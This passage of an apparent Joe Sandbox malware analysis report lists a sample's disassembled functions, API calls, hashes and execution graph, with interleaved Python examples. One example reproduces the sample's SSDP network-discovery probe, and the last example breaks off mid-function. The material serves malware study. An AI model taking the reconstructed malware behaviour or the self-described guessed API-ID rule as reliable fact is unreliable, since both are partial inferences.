                                                                                • Instruction Fuzzy Hash: 1901FFB0A4021CEBCB20DF55DD49BDAB7B4AB04704F00C0BAAA05A7280E6759ED5DF9C
                                                                                APIs
                                                                                • ioctlsocket.WS2_32 ref: 0040112B
                                                                                • recvfrom.WS2_32 ref: 0040119C
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                                • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                • String ID:
                                                                                • API String ID: 3980219359-0
                                                                                • Opcode ID: ab8b34524f24c7ff0ec759a8db121372cfa49b223874d41307e8bdf502b19990
                                                                                • Instruction ID: dd229b18b8e608a96638b9a50d19e2d27eaf393d2ffc9a5ffa46aac6cea4a516
                                                                                • Opcode Fuzzy Hash: ab8b34524f24c7ff0ec759a8db121372cfa49b223874d41307e8bdf502b19990
                                                                                • Instruction Fuzzy Hash: 7C21C3B1504301AFD304DF65DC84A6BB7E9EF88318F004A3EF555A6290E774D9588BEA
                                                                                APIs
                                                                                • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                                • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                                • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                                • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                • String ID:
                                                                                • API String ID: 2074799992-0
                                                                                • Opcode ID: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                                                                • Instruction ID: 85cdc4ac02e7a7d961e62fa06f42dc9c3305788cd6d7a2bd32de2e1c20a60a18
                                                                                • Opcode Fuzzy Hash: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                                                                • Instruction Fuzzy Hash: DD212F715083159BC200DF55D884D5BB7E8BFCCB54F044A2EF59493291D734EA49CBAA
                                                                                APIs
                                                                                • StrChrA.SHLWAPI(00000000,0000007C), ref: 00407326
                                                                                • DeleteUrlCacheEntry.WININET(00000000), ref: 00407348
                                                                                • Sleep.KERNEL32(000003E8), ref: 00407361
                                                                                • DeleteUrlCacheEntry.WININET(?), ref: 00407389
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CacheDeleteEntry$Sleep
                                                                                • String ID:
                                                                                • API String ID: 672405725-0
                                                                                • Opcode ID: 0889daea8db3d00c114acb4ae5d662601a50873d8cf4ae377a86a09432f2b769
                                                                                • Instruction ID: e789c4acaeed7b47b7c3c4d69342d3bd95a049e3571e2ded942ca122a7fff21c
                                                                                • Opcode Fuzzy Hash: 0889daea8db3d00c114acb4ae5d662601a50873d8cf4ae377a86a09432f2b769
                                                                                • Instruction Fuzzy Hash: A5218175E04208FBDB04DFA4D885B9E7B74AF44309F10C4A9ED416B391D679AB80DB49
                                                                                APIs
                                                                                • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                                • WSAGetLastError.WS2_32 ref: 00401B12
                                                                                • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                                • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Send$ErrorLastSleep
                                                                                • String ID:
                                                                                • API String ID: 2121970615-0
                                                                                • Opcode ID: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                                                                • Instruction ID: 6027246a5f20d5291fae036152240cd5c1f9414458335baedc5b4335fd2ad738
                                                                                • Opcode Fuzzy Hash: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                                                                • Instruction Fuzzy Hash: 8F014F712483046EE7209B96DC88F9B77A8EBC4711F508429F608961C0D7B5A9459B79
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0040D8D9
                                                                                • CloseHandle.KERNEL32(?), ref: 0040D908
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0040D917
                                                                                • DeleteCriticalSection.KERNEL32(?), ref: 0040D924
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                • String ID:
                                                                                • API String ID: 3102160386-0
                                                                                • Opcode ID: 52aae5ad70f9b3043191c8c3e05b1acc6f9f728bea5bc6a869e37892dc5a7148
                                                                                • Instruction ID: 6abb592c5b2ce8a5c046663d5def4690e4bb0a573cdaefcdc4ae98697e0ceaa0
                                                                                • Opcode Fuzzy Hash: 52aae5ad70f9b3043191c8c3e05b1acc6f9f728bea5bc6a869e37892dc5a7148
                                                                                • Instruction Fuzzy Hash: 4E1161B4D00208EBDB08DF94D984A9DB775FF44309F1485A9E806A7341C739EF94DB85
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                • String ID:
                                                                                • API String ID: 2223660684-0
                                                                                • Opcode ID: 1975e189502b1b2e69aa421ca111548c6a80ae828394947d262874ebca66cfab
                                                                                • Instruction ID: 487697b266744d2b5c3d358b1528705abebcded3db4b06867e0c0ac6ea0c4339
                                                                                • Opcode Fuzzy Hash: 1975e189502b1b2e69aa421ca111548c6a80ae828394947d262874ebca66cfab
                                                                                • Instruction Fuzzy Hash: 4A01F7792423049FC3209F26ED84A9B73F8AF45711F04443EE44693650DB39E401CB28
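The "API ID" field in each function entry above (for example "File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite" for the CreateFileW/WriteFile/FlushFileBuffers/CloseHandle/InterlockedExchange routine, or "CriticalSection$Leave$EnterExchangeInterlocked" for the entry just above) is the key an analyst can use to match a function against the same function in other reports. The script below is an added example, not code from the report or from Joe Sandbox: it rebuilds that field from the "APIs" lines of an entry. The tokenisation rule it applies is inferred from the entries on this page and is an assumption, not documented Joe Sandbox behaviour: CamelCase API names are split at upper-case letters, all-lower-case names (ioctlsocket, recvfrom, _allshl) stay whole, tokens of three characters or fewer (Get, Set, For, Add, WSA, Str, Dos, Sys, Co, Url and the A/W suffixes) are dropped, the surviving tokens are counted across all listed calls including "Part of subcall function" lines, grouped by count with the most frequent group first, sorted bytewise inside a group, and the groups are joined with "$". The SAMPLE_ENTRY lines are constructed from the SetEvent/WaitForSingleObject entry above in the report's own line format.

```python
import re
from collections import Counter

# Assumed tokenisation rule (inferred from this page, not documented): split at
# upper-case letters so that "WSAGetLastError" -> WSA, Get, Last, Error, keep
# all-lower-case names such as ioctlsocket or _allshl as one token.
_TOKEN_RE = re.compile(r"[A-Z]+(?=[A-Z][a-z])|[A-Z][a-z0-9]*|[a-z_][a-z0-9_]*")

# Matches the API name in report lines such as
# "• WriteFile.KERNEL32(000000FF,...), ref: 0040B0E9" or
# "• ioctlsocket.WS2_32 ref: 0040112B"; also hits the name inside
# "• Part of subcall function ...: HeapFree.KERNEL32(...)" lines.
_API_LINE_RE = re.compile(r"([A-Za-z_][A-Za-z0-9_]*)\.[A-Z][A-Z0-9_]*(?:\(| ref:)")


def api_tokens(api_name):
    """Split one API name into the tokens the API ID is built from.

    Tokens of three characters or fewer are discarded; this is what removes
    Get/Set/For/Add/WSA/Str/Dos/Sys/Co/Url and the A/W suffixes on this page.
    """
    return [t for t in _TOKEN_RE.findall(api_name) if len(t) > 3]


def api_id(api_names):
    """Rebuild the Joe Sandbox style "API ID" from a list of called API names.

    Repeated calls count separately. Tokens are grouped by occurrence count,
    most frequent group first, sorted bytewise inside a group (upper-case
    tokens therefore precede lower-case ones), and the groups are joined by '$'.
    """
    counts = Counter(tok for name in api_names for tok in api_tokens(name))
    by_count = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n]))
                    for n in sorted(by_count, reverse=True))


def parse_api_lines(lines):
    """Extract the API names, in order, from the "APIs" lines of one entry."""
    names = []
    for line in lines:
        m = _API_LINE_RE.search(line)
        if m:
            names.append(m.group(1))
    return names


# Constructed sample: the "APIs" lines of the SetEvent/WaitForSingleObject
# entry on this page, including its subcall line.
SAMPLE_ENTRY = [
    "• SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401346",
    "• WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401352",
    "• CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 0040135C",
    "  • Part of subcall function 0040A660: HeapFree.KERNEL32(00000000,00000000,00402612,?,00402612,?), ref: 0040A6BB",
]


def sample_api_id():
    """API ID of the constructed sample entry."""
    return api_id(parse_api_lines(SAMPLE_ENTRY))


if __name__ == "__main__":
    print(sample_api_id())  # CloseEventFreeHandleHeapObjectSingleWait
```

Two caveats follow directly from the scheme. Because short tokens are dropped, names that differ only in a short token or suffix (StrCmpNW versus StrCmpNIW, CreateFileA versus CreateFileW) produce the same API ID, so a match on this field is a lead, not proof that two functions are identical; compare the Opcode ID or the fuzzy hashes before treating them as the same routine. The "API String ID" value is a hash of the API ID and the String ID whose hash function is not shown on the page, so it is not reproduced here.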
                                                                                APIs
                                                                                  • Part of subcall function 00407250: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407270
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 004071D8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFreeInstanceString
                                                                                • String ID: Microsoft Corporation
                                                                                • API String ID: 586785272-3838278685
                                                                                • Opcode ID: 0f33dd4f09808e29644e00a9613dd62e49f7ac0aadddbd45ce77e6b9e4c1ac58
                                                                                • Instruction ID: 3bd6e37ccb81fb26e20ba6f4aecac2bab56e95e75b440682a2c5ba52433a4c42
                                                                                • Opcode Fuzzy Hash: 0f33dd4f09808e29644e00a9613dd62e49f7ac0aadddbd45ce77e6b9e4c1ac58
                                                                                • Instruction Fuzzy Hash: 2D91EC75A0410ADFCB04DF94C894AAFB7B5BF49304F208169E515BB3E0D734AD41CBA6
                                                                                APIs
                                                                                  • Part of subcall function 0040E070: memset.NTDLL ref: 0040E098
                                                                                  • Part of subcall function 0040E070: InternetCrackUrlA.WININET(0040DB49,00000000,10000000,0000003C), ref: 0040E0E8
                                                                                  • Part of subcall function 0040E070: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E0F8
                                                                                  • Part of subcall function 0040E070: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E131
                                                                                  • Part of subcall function 0040E070: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E167
                                                                                  • Part of subcall function 0040E070: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E18F
                                                                                  • Part of subcall function 0040E070: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E1D8
                                                                                  • Part of subcall function 0040E070: InternetCloseHandle.WININET(00000000), ref: 0040E267
                                                                                  • Part of subcall function 0040DF60: SysAllocString.OLEAUT32(00000000), ref: 0040DF8E
                                                                                  • Part of subcall function 0040DF60: CoCreateInstance.OLE32(004128F0,00000000,00004401,004128E0,00000000), ref: 0040DFB6
                                                                                  • Part of subcall function 0040DF60: SysFreeString.OLEAUT32(00000000), ref: 0040E051
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040DF0B
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040DF15
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                • String ID: %S%S
                                                                                • API String ID: 1017111014-3267608656
                                                                                • Opcode ID: a146118a585c525953cbf50a01d03d7454997d8c312527b14433dc9a100378f5
                                                                                • Instruction ID: c1d615742e0f1fe272601d31d467041fc69409a08f8fe5a36c80dfd154d40f90
                                                                                • Opcode Fuzzy Hash: a146118a585c525953cbf50a01d03d7454997d8c312527b14433dc9a100378f5
                                                                                • Instruction Fuzzy Hash: 5F414BB5E0020A9FCB04DFE4C885AEFB7B9BF48304F148569E505B7390D738AA45CBA5
                                                                                APIs
                                                                                • CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407EC8), ref: 0040DAFA
                                                                                  • Part of subcall function 0040DBC0: socket.WS2_32(00000002,00000002,00000011), ref: 0040DBDA
                                                                                  • Part of subcall function 0040DBC0: htons.WS2_32(0000076C), ref: 0040DC10
                                                                                  • Part of subcall function 0040DBC0: inet_addr.WS2_32(239.255.255.250), ref: 0040DC1F
                                                                                  • Part of subcall function 0040DBC0: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DC3D
                                                                                  • Part of subcall function 0040DBC0: bind.WS2_32(000000FF,?,00000010), ref: 0040DC73
                                                                                  • Part of subcall function 0040DBC0: lstrlenA.KERNEL32(00411C48,00000000,?,00000010), ref: 0040DC8C
                                                                                  • Part of subcall function 0040DBC0: sendto.WS2_32(000000FF,00411C48,00000000), ref: 0040DC9B
                                                                                  • Part of subcall function 0040DBC0: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DCB5
                                                                                  • Part of subcall function 0040DE30: SysFreeString.OLEAUT32(00000000), ref: 0040DF0B
                                                                                  • Part of subcall function 0040DE30: SysFreeString.OLEAUT32(00000000), ref: 0040DF15
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                • String ID: TCP$UDP
                                                                                • API String ID: 1519345861-1097902612
                                                                                • Opcode ID: f2a508b97fbae45076dd5aa5ad3ba9adeb76e4e7dff97a5c25cb73082fa5fcae
                                                                                • Instruction ID: 6b43ad666573891978052671c2ef92d80966ae61c726f1f98895f42c7cfd0708
                                                                                • Opcode Fuzzy Hash: f2a508b97fbae45076dd5aa5ad3ba9adeb76e4e7dff97a5c25cb73082fa5fcae
                                                                                • Instruction Fuzzy Hash: 13117CB5D00208ABDB00EFE5DC46BAEB375EB44308F10856AE405772C6D7786A64CF9A
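Added example, not code from the sample and not part of the Joe Sandbox report: a Python reproduction of the UDP call chain the record above lists for the subcall at 0040DBC0 (socket(2,2,17), htons(0x76C), inet_addr("239.255.255.250"), setsockopt(...,0xFFFF,0x20,...), bind, sendto, ioctlsocket(...,0x8004667E,1)) together with the recvfrom/StrCmpNIA/StrStrIA consumer the execution graph records for 0040DD40. Those constants decode to AF_INET/SOCK_DGRAM/IPPROTO_UDP, port 1900, SOL_SOCKET/SO_BROADCAST and FIONBIO, which is the socket setup of an SSDP (UPnP discovery) probe. The report does not show the buffer at 00411C48 that sendto transmits, so the M-SEARCH text, the "200 OK" status check and the LOCATION header lookup below are assumptions, and the reply used as sample input is constructed.

```python
"""SSDP discovery probe mirroring the socket call sequence recorded by the sandbox.

Added example; not the sample's code. Request body, status check and header
names are assumptions (see the lead-in); SAMPLE_RESPONSE is constructed.
"""
import select
import socket
import time
from typing import Dict, List, Optional

SSDP_GROUP = "239.255.255.250"   # inet_addr argument in the sandbox record
SSDP_PORT = 0x76C                # htons(0x76C): port 1900
RECV_BUF = 1024
FIONBIO = 0x8004667E             # ioctlsocket request in the record (non-blocking mode)

# Constructed SSDP reply used as offline sample input; not captured from the sample.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"CACHE-CONTROL: max-age=1800\r\n"
    b"Location: http://192.0.2.10:49152/rootDesc.xml\r\n"
    b"ST: upnp:rootdevice\r\n"
    b"USN: uuid:00000000-0000-0000-0000-000000000000::upnp:rootdevice\r\n"
    b"\r\n"
)


def build_msearch(search_target: str = "ssdp:all", mx: int = 2) -> bytes:
    """Assumed request body: the standard UPnP M-SEARCH for the group/port the record shows."""
    lines = [
        "M-SEARCH * HTTP/1.1",
        f"HOST: {SSDP_GROUP}:{SSDP_PORT}",
        'MAN: "ssdp:discover"',
        f"MX: {mx}",
        f"ST: {search_target}",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def parse_ssdp_response(data: bytes) -> Optional[Dict[str, str]]:
    """Accept only a 200 reply (a StrCmpNIA-style, case-insensitive status-line compare)
    and return the headers keyed by upper-cased name (a StrStrIA-style lookup ignores case)."""
    head = data.decode("ascii", errors="replace").partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    if not lines[0].upper().startswith("HTTP/1.1 200"):
        return None
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().upper()] = value.strip()
    return headers


def open_discovery_socket(local_port: int = 0) -> socket.socket:
    """Same sequence as the record: socket(2,2,17), SO_BROADCAST, bind, then non-blocking."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)   # level 0xFFFF, option 0x20
    s.bind(("0.0.0.0", local_port))
    s.setblocking(False)                                     # ioctlsocket(s, FIONBIO, 1)
    return s


def discover(timeout: float = 2.0) -> List[Dict[str, str]]:
    """Send one M-SEARCH and collect 200 replies carrying a LOCATION header (needs a LAN)."""
    s = open_discovery_socket()
    found: List[Dict[str, str]] = []
    try:
        s.sendto(build_msearch(), (SSDP_GROUP, SSDP_PORT))
        deadline = time.monotonic() + timeout
        while True:
            left = deadline - time.monotonic()
            if left <= 0:
                break
            ready, _, _ = select.select([s], [], [], left)
            if not ready:
                break
            data, peer = s.recvfrom(RECV_BUF)
            headers = parse_ssdp_response(data)
            if headers and "LOCATION" in headers:
                headers["PEER"] = peer[0]
                found.append(headers)
    finally:
        s.close()                                            # shutdown/closesocket (0040AFF0)
    return found


if __name__ == "__main__":
    for h in discover():
        print(h["PEER"], h["LOCATION"], h.get("ST", ""))
```

`discover()` needs a LAN with UPnP devices answering on the multicast group; `build_msearch()` and `parse_ssdp_response()` run offline, and the latter rejects anything that is not a 200 reply before any header is looked at, which is the shape of the StrCmpNIA-then-StrStrIA sequence in the graph.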
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0041A400,?,00000000,?), ref: 00405E5F
                                                                                • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405E9E
                                                                                • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F13
                                                                                • LeaveCriticalSection.KERNEL32(0041A400), ref: 00405F30
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSectionmemcpy$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 469056452-0
                                                                                • Opcode ID: ca7ff8a173ea6a847f8488c1e8f62911d32ba33057f6ba12d9e30303517d8d68
                                                                                • Instruction ID: 7768dcd7b9dbcee261a05c0b48706a70a5e16e7133226d349280dc208485dc19
                                                                                • Opcode Fuzzy Hash: ca7ff8a173ea6a847f8488c1e8f62911d32ba33057f6ba12d9e30303517d8d68
                                                                                • Instruction Fuzzy Hash: 73216B70D04208ABDB04DF94D889BDEB771EB44304F14C1BAE84567281C3BDAA95CF9A

                                                                                Execution Graph

                                                                                Execution Coverage:14.8%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:1480
                                                                                Total number of Limit Nodes:38
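Added example, not part of the Joe Sandbox report and not the sample's code: a Python reader for the flattened execution_graph dump that follows, so the 1480-node listing can be queried for which functions lead to a given API (for instance, which addresses reach sendto). The record layout assumed here, "<id> <address> <api ...>" for a node and "<a>-><b>" for an edge, is inferred from the dump and is heuristic; a node whose API list the plugin left unresolved appears as "N API calls" and is kept verbatim. EXCERPT is a slice of the dump reassembled by hand for offline use.

```python
"""Parse a Joe Sandbox execution_graph dump into nodes/edges and answer reachability queries.

Added example; not Joe Sandbox code. The token layout is inferred from the dump and
is heuristic: a node is "<decimal id> <6-hex-digit address> <api tokens...>", an edge
is "<caller>-><callee>". EXCERPT is a hand-assembled slice of the report's dump.
"""
import re
from collections import deque
from dataclasses import dataclass, field
from typing import Dict, List, Set

HEX_ADDR = re.compile(r"^[0-9a-f]{6}$")

# Constructed from the report's execution_graph text (entry mutex check, then the
# CoInitializeEx -> socket -> sendto chain), joined back onto one line.
EXCERPT = (
    "execution_graph 4375 407500 Sleep CreateMutexA GetLastError "
    "4376 407536 ExitProcess 4375->4376 4377 40753e 6 API calls 4375->4377 "
    "4378 4075e3 4377->4378 4379 4078a9 Sleep RegOpenKeyExW 4377->4379 "
    "4473 40daf0 CoInitializeEx 4460->4473 5008 40dbc0 socket 4473->5008 "
    "5010 40dbed htons inet_addr setsockopt 5008->5010 "
    "5012 40dc66 bind lstrlenA sendto ioctlsocket 5011->5012 "
    "5011 40af30 8 API calls 5010->5011"
)


@dataclass
class Node:
    nid: int
    addr: str = ""                                  # empty if only ever referenced by an edge
    apis: List[str] = field(default_factory=list)   # API names (or "N API calls" when unresolved)


@dataclass
class Graph:
    nodes: Dict[int, Node] = field(default_factory=dict)
    callers: Dict[int, Set[int]] = field(default_factory=dict)  # reverse edges: callee -> callers

    def node(self, nid: int) -> Node:
        return self.nodes.setdefault(nid, Node(nid))


def parse_execution_graph(text: str) -> Graph:
    """Single pass over whitespace-separated tokens; a decimal token followed by a
    6-hex-digit token opens a node, 'a->b' records an edge, anything else is an API token."""
    g = Graph()
    toks = text.split()
    cur = None
    i = 0
    while i < len(toks):
        t = toks[i]
        if "->" in t:
            a, b = t.split("->", 1)
            if a.isdigit() and b.isdigit():
                g.node(int(a))
                g.node(int(b))
                g.callers.setdefault(int(b), set()).add(int(a))
            i += 1
            continue
        if t.isdigit() and i + 1 < len(toks) and HEX_ADDR.match(toks[i + 1]):
            cur = g.node(int(t))
            cur.addr = toks[i + 1]
            i += 2
            continue
        if cur is not None:
            cur.apis.append(t)
        i += 1
    return g


def nodes_calling(g: Graph, api: str) -> List[int]:
    """Node ids whose API list contains `api` exactly."""
    return sorted(n.nid for n in g.nodes.values() if api in n.apis)


def addresses_reaching(g: Graph, api: str) -> List[str]:
    """Reverse BFS from every node that calls `api`: the addresses of all functions
    on some path into that call, the calling function included."""
    seen: Set[int] = set()
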